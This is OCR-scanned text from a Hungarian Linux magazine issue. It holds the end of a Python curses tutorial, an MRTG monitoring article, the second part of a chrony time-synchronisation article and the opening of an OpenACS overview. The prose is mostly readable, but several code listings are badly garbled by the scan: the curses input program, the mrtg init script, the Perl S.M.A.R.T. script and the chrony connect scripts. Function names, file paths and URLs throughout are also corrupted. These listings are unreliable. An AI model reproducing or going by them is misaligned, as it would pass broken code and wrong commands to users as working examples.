Ha a fentieket szeretnénk semmissé tenni, az egyes soroknak 
megfelelő ellentétes tartalmú utasításokat kell végrehajtanunk: 


curses.echo() 
curses . nocbreak ( ) 
curses .keypad(0) 


Végül pedig az endwin() függvénnyel a terminált az eredeti 
állapotába állíthatjuk vissza: 


curses.endwin ( ) 


Ha ezeket a függvényeket programunk befejezésekor nem hívjuk 
meg, kilépés után a terminál ebben a helyzetben marad. Ilyenkor 
a parancsértelmezőbe kilépve zavaró, ha nem látjuk, amit írunk, 
és csak egy elegánsan kiadott reset oldja meg a gondot: 


H reset 


Nem is beszélve arról, hogyha a programunk például egy 
megszakítás következtében lép ki, a Python által megjelenített 
hibaüzenet is teljesen összekuszálódik. Erre a későbbiekben 
fogunk megoldást látni. 

Itt említeném meg a Python curses . wrapper nevű bővítmé- 
nyét, ami a terminál beállításaival és visszaállításával kapcso- 
latos gondokat hivatott megoldani. Ha a curses . wrapper-rel 
hozunk létre egy programot, az önmagától gondoskodik a 
terminál megfelelő felkészítéséről, és arra is ügyel, hogy prog- 
ramunk befejezésekor a megfelelő állapotban adja vissza az 
irányítást a parancsértelmezőnek. 

A curses-re épülő programjainkban érdemes a traceback 
bővítményt is alkalmazni, mellyel a Python által keltett hiba- 
üzeneteket lehet nyomon követni. Használatára később 
mutatunk példát. 


Ablakok kezelése 


A curses megjelenítése ablakok kezelésére épül. Ha a képer- 
nyőre szeretnénk írni valamit, először egy ablakot kell létre- 
hoznunk. A curses ablakai csak afféle látszólagos ablakok, 
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3. lista Bemenet kezelése 


als deéőtinali zaton 

2 a stdscr.keypad(0) 

6 curses.echo() 

ÉL curses . nocbreak ( ) 

SES curses . endwin ( ) 

65 o 

s import curses 

Éz import traceback 

9 

HR08 Egy: 

E stdsCC — cürseés:  1M1EScÉ() 

ls curses.noecho() 

18 curses.halfdelay(10) 

14 . 

15 c stdscr.box() 

MEGNE stdscr.addstr(1, 1, "KilgpOshez 
Sea yomj ja o sei) 

AlS/8e 

18: case: Stdsev geteh! ) 

IES9 ő 

210 2 Witt ledem e corebé se e 

ZIK stolgae , adestéls; 2. T 114) 

Aa 

zim TE SEÍ A RU GANEGER TESz 55 s 

oszt Sitélgei , elelelelm (5, 2. elm) 

Des else: 

26 sSEcscr . adoleal5, 2. elm 

XV 

28 zeelgei , elelem (6; 2, VIK ele 

ese es eke) 

ae 

306 eh s sedscv Ggetecnt) 

90048 

32 c ieatáTa atás Kor) 

30 

34. ESAGEjOs 

35 tmadszate mon) 

365 a 

35708 éErvaccback STEG ENEN) 


amelyekkel a programunk felületét tagolhatjuk részekre. 
Emellett a grafikus felületekhez szokott felhasználónak talán 
elsőre szokatlan, de a curses ablakainak nincs mélysége. 

A curses csupán két dimenzióban gondolkodik, így elképzel- 
hető, hogy két - elvileg egymást fedő - ablaknak a tartalma 
egyszerre látszik. 

Az stdscer a teljes képernyőt lefedő ablakot jelöli, amiben 

a curses newwin() tagfüggvényével tetszőlegesen további 
ablakokat hozhatunk létre. Több ablakra lehet szükségünk 
akkor, ha a képernyőt valamilyen okból fel szeretnénk osztani, 
így különítve el az egyes részek kezelését egymástól. 


kezdo X.zs 2 

ESszdoy a .5 

magassag - 10 

szelesseg - 20 

ablak - curses.newwin(magassag, 
"$kezdő V, kezdo x) 

ablak. box ( ) 


szelesseg, 








Mint látható, a curses a szokásoktól eltérően az Y koordinátát ve- 
szi előre. A koordináták számozása 0-val kezdődik, vagyis a kép- 
ernyő bal felső sarkában található pontot a (0, 0) koordináta jelöli. 
Az ablak .box() utasítással azt érjük el, hogy megjelenő új 
ablakunk köré (de még annak belsejében) egy keret rajzolódik. 
Ha azonban így futtatjuk le a programot , a képernyőn lát- 
szólag nem történik semmi. Valóban nem történik semmi, 
mivel a curses csak akkor rajzol a valódi képernyőre, ha az egy 
ablakokhoz tartozó refresh () tagfüggvényt meghívjuk. 

A refresh( ) valójában annyit tesz, hogy a noutrefresh() 
tagfüggvény segítségével a képernyő egy részét frissítésre jelöli 
ki, majd meghívja a doupdate () függvényt, ami a frissítést 
ténylegesen elvégzi. Ennek ismerete olyankor hasznos, amikor 
a képernyőn több ablak tartalmát meg akarjuk jeleníteni, és el 
szeretnénk elkerülni a villódzást. Ilyenkor az ablakoknak csak 
a noutrefresh() tagfüggvényét hívjuk meg, és miután 
mindent frissítettünk, csak egyetlen egyszer hívjuk meg a 
doupdate () tagfüggvényt, így látszólag minden egyetlen 
szemvillanás alatt fog előtűnni a képernyőn (1. lista). 


A megjelenítés és a bemenet kezelése 

A curses-ben a megjelenítésért elsősorban az addch() és 
addstr () függvények, valamint az addnstr () függvény 
felelősek. Ha korábban már programoztunk curses-t C-ben, ez 
talán szokatlan. Mint már említettem, a Python az ezekhez a 
függvényekhez tartozó rokon függvényeket elrejti, úgy, hogy 
a működésüket ezeken az egyszerű utasításokon keresztül 
valósítja meg. Nincs külön mvaddstr () vagy mvwaddstr ( ) , 
amelyekkel azt szabályozhatnánk, hogy melyik ablakban és 
milyen koordinátákon jelenjen meg az adott szöveg, hanem 
mindent egyszerűen az addstr () tagfüggvénnyel megold- 
hatunk. Az addnstr () függvény annyiban különbözik az 
addstr ( ) -től, hogy amennyiben ezt a függvényt használjuk, 
a karaktersorozatból legfeljebb csak n számú karakter íródik ki. 
A függvények elsőként a megjelenítendő koordinátákat 
várják, amelyeket természetesen el is hagyhatunk, ezt követi 
a karakter vagy karaktersorozat megadása, végül pedig 

a szöveg tulajdonságainak megadása, amelyet úgyszintén 

el lehet hagyni: 


addch(í[lv;, x,]1 ch [, attr]) 
addstr([Iy, x,] str Í, attr]) 
addnstrílv; x.1 str, n [; attr]) 


Ha nem adjuk meg a kiírandó szöveg koordinátáit, akkor a 
karaktersorozat a kurzor jelenlegi helyén fog kiíródni. Minden 
kiírási műveletet követően a kurzor az utolsó kiírt karakter 
utáni helyre vándorol. Az addnstr () esetében azonban hiába 
adjuk meg az n kapcsolót, ha a szöveg nem megfelelően hosz- 
szú, a kurzor akkor is csak a szöveg utáni helyre kerül. 

A move (y, X) függvénnyel a kurzort tetszőleges helyre állít- 
hatjuk, olyan helyre, ahol nem zavar az állandó villódzásával. 
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Ha teljesen el szeretnénk tüntetni, a set cur(0) 
utasítást kell kiadnunk. 

A szöveg színét, illetve megjelenítésének módját az 
utolsó kapcsoló határozza meg. A kapcsoló lehetséges 
értékeit táblázatunk tartalmazza. A táblázatban talál- 
ható elemek esetén nem mindegyik esetében biztos, 
hogy a megfelelő megjelenítési módot a használt 
terminál is támogatja. Az egyes kiemelési típusokból 
többet is megadhatunk, ha az elemeket bitenkénti 
vagy ("[" műveleti jellel kapcsoljuk össze. 

A szín megadása azinit pair() és color pair() 
függvényekkel lehetséges. Ha a curses . wrapper bővítmény 
felhasználásával készítjük a programunkat, akkor a színek 
kezelése -— ha a terminál is támogatja — teljesen önműködő. 

Ha azonban a curses tulajdonságait saját kezűleg állítottuk 

be, akkor közvetlenül az initscr () meghívása után a 

start color() függvénytis meg kell hívni. 

A függvények használatára a 2. lista mutat példát. 

Az adatok beolvasására a getch () függvény áll rendelkezésre: 
ch - stdscr.getch() 

Alapértelmezés szerint a getch() az első lenyomott billen- 
tyűig vár. Ha nem szeretnénk tétlenül várakozni, használhatjuk 
a nodelay () és halfdelay() függvényeket. Ha a 

nodelay ( ) -t igaz értékkel hívjuk meg, akkor amennyiben 
nincs kiolvasandó karakter, a getch() azonnal visszatér -1 
(ERR) értékkel. A halfdelay() működése hasonló, azzal 

a különbséggel, hogy a függvény első értékeként megadható, 
hogy hány tizedmásodpercig várjon billentyűleütésre. 

A getch() visszatérési típusa egész szám típus (integer). 
Ha az értéke 0 és 255 közötti, akkor a szám valamilyen karak- 
tert jelöl. Ha az érték kisebb nullánál, akkor valamilyen hiba 
történt, ha nagyobb 255-nél, akkor a keypad (1) függvény 
következtében a szám valamilyen vezérlőkaraktert jelöl, ami 
lehet például curses.KEY LEFT vagy curses.KEY HOME 
stb. (3. lista). 


Összegzés 

A curses gyorsan tanulható és egyszerű eszköz hatékony szö- 
veges módú alkalmazások írására. Ismertségének köszönhetően 
az is biztosított, hogy a felhasználásával írt Programok bonyo- 
dalom nélkül képesek szinte bárhol, bármilyen Unixon futni. 


Gludovátz Gábor 

(ggaborosopron.hu) egy soproni cég Linux- 
rendszerekkel foglalkozó rendszergazdája. 
Kedvenc időtöltése a programozás, és a 
Linux lelkivilágában való kutakodás. Ha Ideje 
engedi, szívesen hódol szenvedélyének és 
bringáján a környező erdőket járja. Honlapja a 

2 http:/Awww.sopron.hu/-ggabor/ címen érhető el. 





Kapcsolódó címek 


A Python-honlap 53 http:/Avww.python.org 

Curses lépésről-lépésre 

2 http://py-howto. sourceforge.net/curses/curses.htmi 
Curses-leírás 

2 http://python.org/doc/current/lib/module-curses.html 
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MRTG - nem csak a hálózat figyelésére! 


Az MRIG eredetileg egy hálózati forgalmat figyelő program, ami a hálózat 
terheltségének függvényében, png formátumban grafikonokat hoz létre. 


gyszerűségének köszönhetően bárminek a megfigyelé- 
a sére használható, amit két számmal ki lehet fejezni. 

Az MIRG (Multi Router Iraffic Grapher) első változatát 
Tobias Oetiker Perl nyelven írta meg, majd egyes részeit a jobb 
teljesítmény érdekében C-kóddal helyettesítette (2.0). Linux és 
Windows NT rendszereken egyaránt fut; a weblapon részletes 
lista található arról, hogy mely operációs rendszereken próbál- 
ták már ki. A GPL keretein belül szabadon használható. 

Aki csak pár hálózati kapcsolatát, illetve a processzorterheltséget 
szeretné figyeltetni, annak figyelmébe ajánlom trey nagyon jó, 
magyar nyelvű leírását a 5 http:/wwwi.szabilinux.hu/mrtg/ címen. 


Telepítés 
Az MRIG 2.9.17-es változatát próbáltam ki; Debian Woody GNU/ 
Linux-rendszerre telepítettem, miként azt már megszokhattuk: 


apt-get install mrtg 


Más népszetű terjesztéseknek szintén része. Függőségként az 
snmp, illetve a PNG kezeléséhez szükséges könyvtárakat rak 
fel. Támogatja a SNMPvT-et és az SNMPv2-t, a cikk írása idején 
azonban az SNMPv3-at még nem. 

Az SNMP (Simple Network Managment Protokoll) lényege 
röviden összefoglalva az, hogy a hálózati eszközök és a nyom- 
tatók kezelését leegyszerűsítse. Az SNMP-t alapvetően egysze- 
rűre tervezték, teljes megvalósítása mégis 500-600 oldal terje- 
delmű. Az elgondolás lényege: léteznek ügynökök és felügye- 
leti állomások, amelyek kapcsolatot tartanak egymással. 

A felügyeleti állomás általában egy általános célú számítógép, 
ami az ügynökök állapotát tudja lekérdezni, illetve beállítani. 
Ha valakit részletesebben érdekel a téma, Andrew S. Tanen- 
baum Számítógéphálózatok című könyvét ajánlom. 

Annak ellenére, hogy az MRIG is tartalmaz SNMP-megvaló- 
sítást, érdemes feltenni az snmpd-t (apt-get install 
snmtd). Alapbeállításokkal biztonsági okokból nem használ- 
ható, ezért hogy működésre bírjuk, nyissuk meg kedvenc 
szövegszerkesztőnkkel a beállítófájlját (Debian: /etc/snmp/ 
snmpd.conf), és írjuk át a vonatkozó részt az 1. listának megfele- 
lően. Alapértelmezett kapuja az UDP161 , 162. Ha szükséges, 
engedélyezzük a tűzfalunkon. 


Könnyen is lehet: a cígmaker 

Telepítés után egy példa beállítófájlt: /etc/mrtg.cfg találhatunk, 
amit alapértelmezés szerint ötperceként le is futtat 
(/etc/cron.d/mrtg). A következő paranccsal nagyon egyszerűen 
létrehozhatjuk a saját gépünkre szabott beállítófájlt, aminek 
több hálózati kapcsolata is lehet: 


cÍfgmaker 127.0.0.1 --output /etc/mrtg.cfíg 
Bármelyik hálózati kártya IP-címét megadhatjuk, természete- 


sen a localhost-ot is, ahogyan a példában látni lehet. Ezzel 
el is készült egy beállítófájl, ami minden hálózati csatoló 


64 


Linuxvilág 


1 sec.name source 

community 

HcomZsec paranoid default DÜGLTE 
comZ2sec readonly default DÜBVTG 
HcomZsec readwrite default private 


HI/61n/sh 
case "S1" 
startA 
/áús7/bin/mreg -/ete/mrtg.ctg  — - logging 
— /vam OG AMEESBÉÉSG 


141 


stop) 
kitiascáta/SECc/MEG CÉG DTd 
1) 
echo "Usage: /etc/init.d/mrtg 
(Sat SEOp [ES 
exit 1 


esac 
SSETBHO 


(interface) szükséges beállításait tartalmazza. 
Az MRIG-t általában cron-ból érdemes futtatni, illetve 
következő paranccsal: 


mrtg /etc/mrtg.cfg 


Az utóbbi a kipróbálás során hasznos, hogy az eredmény 
létrehozását megsürgesse. Démonkérnt is futtatható, csak be 
kell szúrnia következő sorokat a beállítófájlba: 


RunAsDaemon: Yes 
Interval: 5 


Hogy rendszerinduláskor elinduljon, készítsünk egy a 2. listán 
láthatóhoz hasonló parancsfájlt, és Debian esetén helyezzük 

a /etc/init.d/ könyvtárba; majd egy közvetett hivatkozást 
(symlink) a /etc/rc2.d/ könyvtárba, vagy más rc" . d könyvtárba 
— a kedvenc futási szintnek (runlevel) megfelelően. Ha démon- 
ként fut, jobb, ha mindezt nem rendszergazdaként teszi. Az 
alábbi kapcsolókkal állítható be, hogy milyen felhasználóként, 
illetve csoportként fusson: 


--user-user name and --group-group name 


Ha a beállítófájl megváltozott, a démont újra kell indítani, hogy 
észlelje a változásokat. Az alapértelmezett könyvtár, ahová az 





HRÖszlet az mrtg. CISejütsztgj ültek 


Target Í[Ismatt] : 
mes c/mrta/ scT üss MEN BES BET. 
MaxByteslsmart]: 100 


OptionslÍsmart]: gauge, nopercent, transparent 


Unscaledl [smart] : dwym 
XSizelezwtl: 600 
meizelezwíl: 200 


YLegendísmart] : Number of test 
5 PreFailure/Advidory 
ShortLegendlsmart] : 5 
HLegendi [smart]: Threshold: 
Legendolsmart] : Prefailure: 
Legendí [smart] : Advisory: 
Titlelsmarti: S.M.A.R.T test on 
eaooLlczus. syscont ig hü 
PageToplsmart]: -HI:SSMART usage on 
SSEGGTEZÜS SSYSCON ET he / S 


$!/usr/bin/perl 


print " ".(int("ide-smart /dev/hda ] grep 
mPrefaildüre [ wc SH SEBOKSAAKOTON JET Tés 
print "  ".(int("ide-smart /dev/hda ] grep 
sadvigdődi ! wc -1A ENE ESC Heat) 
print " ".(int("ide-smart /dev/hda ] grep 
advisory Í] wc -1" /I SSollb ekblőke "mn) ; 
print " ".(int("ide-smart /dev/hda ] grep 
mezes éém ] wc -II Kb. mn) ; 


SüpttmeSei "/usr/bidüpééme sles ecetes ke ést 
SEA 

agotime - split(7  /, Súptiíme) ; 

auotime  "— eplit[/upz; , "auptime 101) : 

Sserver - !"/bin/uname -n"; 


DECintE toüptime (I vm; 
printf Sserver; 


elkészített weblapot rakja, a /var//www/mrtg, ami felülbírálható, 
ha a cígmaker programot a 


--global "WorkDir: /home/mrtg/public html" 


beállítással indítjuk. Az elkészült fájlban a System, Maintainer 
stb. részek nyugodtan átírhatók. A cfgmaker súgóoldalán 
ahhoz is elegendő tájékoztatást találunk, hogy saját beállítófájl- 
készítőt hozzunk létre. 

Ha mindezzel megvagyunk, kell 5-10 perc, amíg az MRIG 

, bemelegszik", és használható adatokkal lát el minket a hálózat 
forgalmáról. Ha a weblap egyszerűnek tűnik, tetszés szerint 
tovább alakítható: háttér, cím — mondhatni szinte minden meg- 
változtatható; vagy a kifejezetten MRTG-hez írt programmal, az 
indexmaker-rel is lehet próbálkozni. Mi mindent figyelhetünk 
MRIG segítségével? A cikk további részéből ez is kiderül. 


Más lehetőségek 

Mielőtt meg jobban belevetnénk magunkat, néhány szót ejtek 
a beállítófájl írásmódjáról. Minden kulcsszónak a sor elején kell 
kezdődnie. Az üres sorokat figyelmen kívül hagyja. A megjegy- 
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coolczus aCodmáeus eke 
/mrtg/scripts/smart.stat 
216 
46 
10 days 
CGOKEZUS 
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zés jele a kettős kereszt (77). Ha a kulcsszó utáni sor fehér 
karakterrel (IAB5 5 , SPACE) kezdődik, akkor azt az előző sor 
végéhez fűzi. Ez áttekinthetőbb beállításokat eredményez, ami 
akkor érdekes, ha a beállítóftájlba HIML-kódot is írunk. 

Most nézzük végig a lehetőségeket! Miként a bevezetőben 
olvasható, mindenre alkalmas, ami két számmal vagy többel 
kifejezhető. A 3. listának megfelelően a Target résznél meg lehet 
adni egy programot (általában egy egyszerű héjprogramot vagy 
Perl-parancsfájlt lásd a 4. listát), ami a standard kimenetére az 
5. listán látható formában írja ki az adatokat. Szögletes zárójel- 
ben egy tetszőleges nevet kell megadni, amire az adott beállítás 
vonatkozik. A példában a Perl-parancsfájl az ide-smart 
programkimenetet dolgozza fel (Debian esetén: apt-get 
install ide-smart), és a Prefailure/Advisory százalékos 
eloszlását számolja ki. Iovábbi kulcsszavak a teljesség igénye 
nélkül: MaxBytes: — a beosztás legnagyobb értékét állítja be. 
Options: — néhány beállításnál eldönthetjük, engedélyezzük-e 
vagy sem. A gauge: az átadott értékeket megjeleníti a grafiko- 
non. Alaphelyzetben a két érték különbségét veszi, és elosztja 

a köztük eltelt idővel; a nopercent: százalékban kifejezve nem 
írja ki; transparent: az elkészített képnek átlátszó háttere lesz. 
Unscaled: megadható, hogy melyik grafikont rajzolja ki (d—day 
w-week m-month y-year), a példa szerint mind a négyet 
kirajzolja. Xsize, YSize: a grafikon méretét lehet megadni, pixel- 
ben. Ylegend: a mértékegység megadható, szavakban. A Short- 
LegendlsmartI: előző szolgáltatás rövidítve. Legend[1234IOTJ: 
hatféle magyarázat az értékekhez. 

A többi beállítás és jelentése megtalálható a hivatalos webla- 
pon. Például XZoom, XScale, PageFoot, Options[]: nobanner, 
Background, Timezone és még sok más is. 


Osszefoglalva 

Az MRIG-t alapvetően a hálózati eszközökön folyó forgalom 
ellenőrzésére fejlesztették ki, amire bonyolult hálózatok esetén 
is tökéletesen megfelel. Csak a képzelet szabhat határt annak, 
hogy mit figyelünk meg. 


Kolcza Péter 

(kpeterXOsysconfig.hu) Imádja a South Parkot. A Miskolci 
Egyetem informatika szakos hallgatója. Elvakult GNU/LINnux- 
rajongó. Ha egyetemi elfoglaltságai engedik, rendszerépí- 
téssel foglalkozik. A cikkel kapcsolatban minden észrevételt 
szívesen fogad. 


Kapcsolódó címek 


2 http://www.snmp.com 

9 http://people.ethz.ch/—oetikerAvebtools/mrtg/ 
5 http://ffag.mrtg.org/howto.html 

5 http:/Avww.david-guerrero.com/papers/snmp/ 
5 http:/boda.vstu.edu.ua/activity/ 
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Vigyünk haza atomórát a chrony segítségével! (2. rész) 


Vigyázz, kész, összehangolás! 


Ebben az esetben nem rossz ötlet, ha valamennyi óráját 

összehangoljuk. Alapértelmezés szerint a chronyd 
szigorúan NIP-ügyfélként viselkedik a server kulcsszóval 
megadott kiszolgálókat figyelembe véve. A chronydt-t azon- 
ban úgy is beállíthatjuk, hogy a saját alhálózatunk kiszolgáló- 
jaként működjön. Ehhez mindössze az allow kulcsszót kell 
a chrony.conf fájlba helyeznünk, és valamilyen gépnevet vagy 
alhálózatot meghatározni. Például az én otthoni gépeim ether- 
netkártyái az (útvonalválasztással nem elérhető, , non routable") 
192 .168-as alhálózatra vannak beállítva, ezért a kiszolgáló- 
ként működő gépen a következő kifejezést helyeztem el 
a chrony.conf fájlban: 
allowi92.168 
Így aztán otthonom többi gépe egészen egy egyszerű chronyd 
beállításfájl felhasználásával egyeztetheti óráját a kiszolgálóval 
(címe: 192.198.0.1): 
SSÉVST 432: 198504 
keyfile /etc/chrony.keys 
commandkey 9 
driftfile /etc/chrony.drift 
Összefoglalásképpen a modemkapcsolatot felépítő gép 
chrony.conf fájlja az alábbiakban olvasható. Megjegyzés: 
a példában szereplő NIP-kiszolgálókat kell helyettesíteni 
a NIP-kiszolgálólistából választott gépnevekkel: 
server ntp.ctr.columbia.edu offline 
server clock.psu.edu offline 
server ntpO.cornell.edu offline 
commandkey 9 
keyfile /etc/chrony.keys 
driftfile /etc/chrony. drift 


2 lőfordulhat, hogy otthonunkban több gép is található. 


Az ügyfél futtatása 

Most, hogy a chrony már telepítve van, ellenőrizzük, hogy 

a chronyd valóban fut-e a háttérben (és indítsuk el, ha szük- 
séges). Ne feledjük, hogy a beállításfájl (az offline kulcsszóval) 
adja meg, hogy a chronyd engedély nélkül ne kezdje el lekér- 
dezni a kiszolgálókat. Építsük fel a modemes kapcsolatot, ellen- 
őrizzük, hogy hozzákapcsolódtunk-e az ISP-hez, és indítsuk el 
a chronyc-ügyfelet. 

A chronyc-be írandó első parancs a password (jelszó). 

Ezt követően az online paranccsal utasítsuk a démont, hogy 
kezdjen el beszélgetni az NIP-kiszolgálókkal. Listázzuk ki 

az NIP-kiszolgálókat (sources -v, ami a sources parancs 
beszédesebb formája). Figyeljük meg a — (hullámjelet) a máso- 
dik oszlopban! Ez azt mutatja, hogy a kiszolgálót még nem 
lehet használni. Túl korán van ugyanis: a démonnak szüksége 
lesz néhány percre ahhoz, hogy az időpontokat összhangba 
hozza, illetve hogy megállapítsa, az NIP-kiszolgáló válaszai 
nem bolondságok. Valamiféle kozmikus együttállás miatt a 
gépem órája és az NIP-időpont közti különbség éppen 42 má- 
sodperc volt (dicsőség Douglas Adams-nek!). 

Várjunk egy percet, és adjunk ki még egy sources parancsot. 
Egy idő után azt fogjuk látni, hogy a chronyd kiválasztotta 
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valamelyik kiszolgálót (azt, ahol egy csillag jelenik meg a má- 
sodik oszlopban), és a gépünk időelcsúszása csökkenni kezd: 
"xx cudns.cit.cornel1.edu2 6 54 

sz ,2999ms [12999ms] /- 3653ms 

A chrony lassú ütemben gyorsítja vagy lassítja az órát, hogy 
az hűen tükrözze az NTP-időt. Így néhány percnyi időtar- 
tamon belül minden eltérés fokozatosan eltűnik. 


További hasznos parancsok 

e tracking (követés): megmutatja, hogyan jár a rend- 
szeróra, azaz mennyire siet vagy késik a NIP-forráshoz 
viszonyítva. 

e  sourcestats -v: megmutatja, hogy az eddig összegyűj- 
tött adatok alapján mit gondol a forrásról a chronyda. 

e . makestebp: a fokozatos közelítés helyett a rendszer óráját 
azonnal az NIP-időre állítja. Egyenértékű az idő 
beállításával. Néhány X11-változat kifagyhat, ha az időt 
jelentősen visszaállítjuk. 


Kapcsolódó címek 


chrony-honlap 
2 http:/Avww.rrbcurnow.freeuk.com/chrony/jreleases.html 


Az NTP-kiszolgálók listája 
2 http:/Avww.eecis.udel.edu/—mills/ntp/servers.htm 


NIST Time and Freguency Division 
2 http:/Avww.boulder.nist.gov/timefreg 


NIP-honlap 3 http:/Avww.eecis.udel.edu/—ntp 





Végül ne feledjük el kiadni a chronyc offline parancsát, 
mielőtt szétkapcsolódunk a modemen, különben a chrony 
azt fogja hinni, hogy a kiválasztott forrás elérhetetlenné vált, 
és fáradhatatlanul újat akar majd kiválasztani. 


Onműködő összehanyolás 

Ahogy azt kitalálhattuk, a chronyc szinte könyörög az önmű- 
ködő működtetésért. Könnyen készíthetünk két egyszerű 
parancsfájlt, amelyek a chrony-t ki-bekapcsolgatják. A követ- 
kező bekapcsoló parancsfájlt: 

t! /bin/sh 

H This script is called after 

t connect 


/usr/local/bin/chronyc czx-EOF 

password zack 

online EOF 

a modemes kapcsolat felépülése után hívjuk meg. A kikapcsoló 
parancsfájlt: 

HI! /binzáén 

H ez a parancsfXjl szötkapcsol dEs elitt 

H h v dik meg 


/üst;locai/jbinyzchronya eszHOF 

password zack 

offline 

EOF 

azelőtt kell meghívnunk, mielőtt szétkapcsolnánk. 

Ha egyedi tárcsázót használunk, nézzük meg, van-e lehetőség 
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kapcsolódás utáni (post-connect) és szétkapcsolás előtti (pre- 
disconnect) műveletek végrehajtására. Én az ATT Global 
Network tárcsázóprogramot használom, ami lehetővé teszi, 
hogy ilyen parancsfájlokat helyezzek a /opt/attdial/bin 
könyvtárba. Ha a egyszerű vanilla PPP-t használjuk, az online 
parancsfájlt a /etc/ppp/ip-up fájlba, az offline parancsfájlt pedig 
a /etc/ppplip-down könyvtárba kell helyeznünk. Néhány 
terjesztés előnyben részesíti, ha békén hagyjuk az ip-up és ip- 
down részeket, és csak az ip-up.local és ip-down.local fájlokat 
módosítjuk (nézzük meg, léteznek-e ilyen fájljaink). 


Összegzés 

A chrony-t eszményi eszköznek találtam gépem órájának 
modemes összehangolásához, mégpedig egy olyan kapcsolaton 
keresztül, ami csak hetente néhány órán keresztül él. Szeretnék 
köszönetet mondani a chrony szerzőjének, Richard Curnow- 
nak, aki értékes észrevételekkel segítette munkámat, és sok 
kérdésemre választ adott. 
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] Fred Mora 

Unix-rendszergazda és -fejlesztő az 1990-es 
I évektől kezdve. Több könyv és műszaki 
kézikönyv szerzője és társszerzője. Fred az 
IBM-nél dolgozik. 
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OpenACS 


em kell sokat erőlködnünk, hogy visszagondoljunk 

a dotcom-korszakra, amikor még olyan cégeknél lehe- 
tett dolgozni, amelyek bármit megcsináltak. Ennek a 
korszaknak az elején, midőn az Internet a hírközlés élvonalába 
kezdett törni, igen sok szó esett az online-közösségekről. 

Az ilyesfajta közösségek természetesen nem jelentettek újdon- 
ságot a veterán interneteseknek, akik már jóval a Web megje- 
lenése előtt jelentkeztek a Usenetre. A tőkések és befektetők 
szemében viszont nagyszerű lehetőségnek tűnt, hiszen az 
online-közösségeket lehetséges, hatalmas piacnak látták. 

Mint oly sok hasonló ötlet esetében, minden nagyszerű volt, 
az üzleti modellt kivéve. Sok-sok ezer online-közösség létezik 
manapság, amelyek mindegyike lehetővé teszi, hogy a világ 
különböző pontjain élő emberek adatot és ötleteket cserélhes- 
senek egy témában. Ennek ellenére csak igen kevés hely tu- 
dott üzletet alapozni az ilyen közösségekre, holott kétségte- 
len, hogy ezek a programok létfontosságú részei a mai 

webes háttérnek. 

Online-közösséget szervezni relációs adatbázisok és progra- 
mozási nyelvek segítségével nem olyan nagy feladat — a hónap 
tizedik webes adatbázis felhasználókezelő rendszerét létre- 
hozni viszont már bosszantó a fejlesztőnek és költséges az 
ügyfélnek. Ráadásul mi történik, ha a webhelyet új szolgálta- 
tással kell bővíteni? Jó lenne, ha az új képességek és hibajaví- 
tások az összes honlapon látszanának, és nem csak azon az 
egyen, amelyiken a változtatást végeztük. 

Philip Greenspun, a csodálatos Philip and Alex s Guide to Web 
Publishing című mű szerzője mindezekre már a 90-es évek ele- 
jén ráérzett, amikor még a Web és az adatbázisok házassága 
viszonylag zsenge ötlet volt. Az ő megoldása értelmében létre 
kell hozni egy alkalmazáskészletet, ami annyi online-közösség 
igényeit elégíti ki, amennyit csak lehetséges. Az általa készített 
programcsomag szolgált alapul doktori téziseihez az MII-n. 
Ugyancsak ezek szerint az elvek szerint működött az általa 
alakított webtanácsadó cég, az ArsDigita is. Amikor az ArsDigita 
Community System (ACS) végül megjelent, Greenspun a GNU 
General Public License (GPL) oltalma alá helyezte. 

Mint számos webtanácsadó cég, az ArsDigita sem tudta bevál- 
tani a hozzá fűzött reményeket. Néhány év tündöklő siker 
után - a cég továbbfejlesztése érdekében -— új befektetőkkel 
gyarapodtak. Greenspunt kiszorították; a cég két félkész ACS- 
változatot jelentetett meg (az egyiket Javában, ami a rendszer 
teljes újraírását jelentette); a csapat nagy része szétszéledt, míg 
végül a Red Hat (amelyet ugyanazok a befektetők támogattak, 
mint akik az ArsDigitát) fogadott egy maréknyi programozót, 
és átvette a cég megmaradt értékeit. 

Ha az ArsDigita üzleti vállalkozás lett volna, a történet itt vé- 
get is érne. Mivel azonban az ACS GPL védelem alá tartozott, 
a közösség ott folytatta, ahol a cég abbahagyta. Pontosabban a 
közösség egy ideje már dolgozott egy ACS-változaton, amelyet 
OpenACS-nek kereszteltek, ez azonban a PostgreSOL relációs 
adatbázis-kezelőt alkalmazta az ACS-ben alapértelmezett 
Oracle helyett. (Ebben a cikkben azt feltételezzük, hogy rend- 
szerünk PostgreSOL --lel dolgozik; ha mégis az Oracle-t válasz- 
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tanánk, az utasítások csak kis 
mértékben változnának.) 

Az OpenACS 4.5, ahogyan az első 
termelésre szánt változatot nevezték, ez év : 
júniusában jelent meg. Új neve - , Open Architecture 
Community System" - jelzi, hogy az ArsDigita nem létezik 
többé. Greenspun hatása azonban egyértelműen érződik az 
OpenACS-közösségben, és az ArsDigita-alkalmazottak által 

írt rengeteg kód, illetve leírás sokat lendített a projekten. 
Ebben a hónapban áttekintjük az OpenACS világát, amely 

a manapság elérhető egyik leghatékonyabb (bár viszonylag 
ismeretlen) nyílt forrású webeszköz. A következő hónapokban 
megnézzük, hogyan lehet telepíteni az OpenACS-t, hogyan 
használhatjuk sablonozórendszerét dinamikus weblapok 
létrehozására, és miképpen készíthetünk kifinomult online- 
közösségeket kevés kóddal és felügyelettel. 






Mi is tulajdonképpen az OpenACS? 

Legegyszerűbben azt mondhatnánk, hogy az OpenACS online- 
közösségek fejlesztéséhez szánt eszközkészlet. De mit is jelent 
ez? Például azt, hogy az OpenACS az összes olyan alkalmazás 
működőképes változatát tartalmazza, amelyre egy közösségi 
honlap létrehozásakor szükségünk lehet. Kezeli a felhasználók 
felvételét és kezelését, a tórumokat, a GyK-et (FAO), a csopor- 
tokat (egy gazdag jogosultságrendszert is beleértve), a hírek 
frissítését, a fájltárolást és a terjesztést, a személyes honlapokat, 
a felméréseket és webalapú naptárat. Ahogy azt egy korszerű 
rendszertől elvárhatjuk, az alkalmazások felügyelete csaknem 
teljes egészében a Weben keresztül végezhető, és pár beállítás- 
fájlon alapul. 

Egy tapasztalt fejlesztő valószínűleg el tudna készíteni egy 
pár, esetleg az összes alkalmazást néhány hét vagy hónap alatt. 
De minek újra feltalálni a kereket? Ráadásul az OpenACS az 
ilyen közösségi rendszerek fejlesztése során szerzett együttes 
tapasztalatok alapján készült, és ez tükröződik az adatmodell 
és az alkalmazások kifinomultságában. 

A fejlesztő szemszögéből nézve az OpenACS olyan adatbázis- 
sal rendelkezik, amelyet úgy terveztek, hogy egyszerűen 
lehessen benne új beépített alkalmazásokat elhelyezni. Iulaj- 
donképpen éppen ez az adatmodell az OpenACS legfontosabb 
